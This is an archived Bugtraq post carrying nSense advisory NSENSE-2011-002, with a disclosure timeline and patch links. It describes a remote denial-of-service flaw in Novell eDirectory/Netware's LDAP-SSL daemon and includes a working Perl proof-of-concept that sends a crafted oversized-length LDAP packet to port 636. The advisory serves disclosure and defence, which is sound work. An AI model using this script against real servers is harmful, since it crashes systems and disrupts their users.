lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BANLkTimTLUeLXmooXyDON0tDNXNNEk+ESQ@mail.gmail.com>
Date: Mon, 16 May 2011 13:21:22 +0300
From: Henri Lindberg <henri+lists@...nse.fi>
To: bugtraq@...urityfocus.com
Subject: NSENSE-2011-002: Novell eDirectory/Netware LDAP-SSL daemon

       nSense Vulnerability Research Security Advisory NSENSE-2011-002
       ---------------------------------------------------------------

       Affected Vendor:    Novell
       Affected Product:   Netware, eDirectory
       Platform:           Netware / Linux
       Impact:             Remote Denial of Service
       Vendor response:    Patch
       CVE:                None
       Credit:             Knud / nSense

       Technical details
       ---------------------------------------------------------------
       It is possible to cause a Denial of Service in Novell's
       LDAP-SSL daemon due to the system blindly allocating a
       user-specified amount of memory. Exploiting the issue on a
       Netware system will cause a system-wide DoS condition. A script
       for replicating the issue is included below:

       #!/usr/bin/perl
       # usage: ./novell.pl 10.0.0.1 0x41424344
       use IO::Socket::SSL;
       $socket = new IO::Socket::SSL(Proto=>"tcp",
       PeerAddr=>$ARGV[0], PeerPort=>636);
       die "unable to connect to $host:$port ($!)\n" unless $socket;
       print $socket "\x30\x84" . pack("N",hex($ARGV[1])) .
       "\x02\x01\x01\x60\x09\x02\x01\x03\x04\x02\x44\x4e\x80\x00" ;
       close $socket; print "done\n";


       Timeline:
       20100819     Contacted vendor, supplied PoC
       20100825     Vendor acknowledges receipt of information
       20100826     Vendor creates ticket, SR # 10645215982
       20100922     nSense requests status update
       20100928     Vendor responds that a fix is being tested
       20101109     nSense requests status update
       20101112     nSense requests status update
       20101112     Vendor responds, fix is still being tested
       20101221     nSense requests status update
       20101227     Vendor responds, patch is being built
       20110124     nSense requests status update
       20110127     Vendor responds, patches planned for medio feb 2011
       20110320     nSense requests status update
       20110329     nSense requests status update
       20110329     Vendor responds, other issues discovered in code
       20110409     Vendor responds, patch issued for eDirectory
       20110409     nSense asks for netware patch date
       20110419     nSense asks for netware patch date
       20110427     nSense asks for netware patch date
       20110504     Vendor responds, netware patch released

       Solution
       Install the vendor supplied patch.
       Netware:    http://download.novell.com/Download?buildid=bXPFv5btgsA~
       eDirectory: http://download.novell.com/Download?buildid=-KMoN4RVaCQ~

       Links:
       http://www.nsense.fi                       http://www.nsense.dk



       $$s$$$$s.   ,s$$$$s   ,S$$$$$s.  $$s$$$$s.   ,s$$$$s   ,S$$$$$s.
       $$$  `$$$  ($$(       $$$  `$$$  $$$  `$$$  ($$(       $$$  `$$$
       $$$   $$$    `^$$s.   $$$$$$$$$  $$$   $$$    `^$$s.   $$$$$$$$$
       $$$   $$$       )$$)  $$$        $$$   $$$       )$$)  $$$
       $$$   $$$  ^$$$$$$7    `7$$$$$P  $$$   $$$  ^$$$$$$7   `7$$$$$P

                      D r i v e n   b y   t h e   c h a l l e n g e _

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ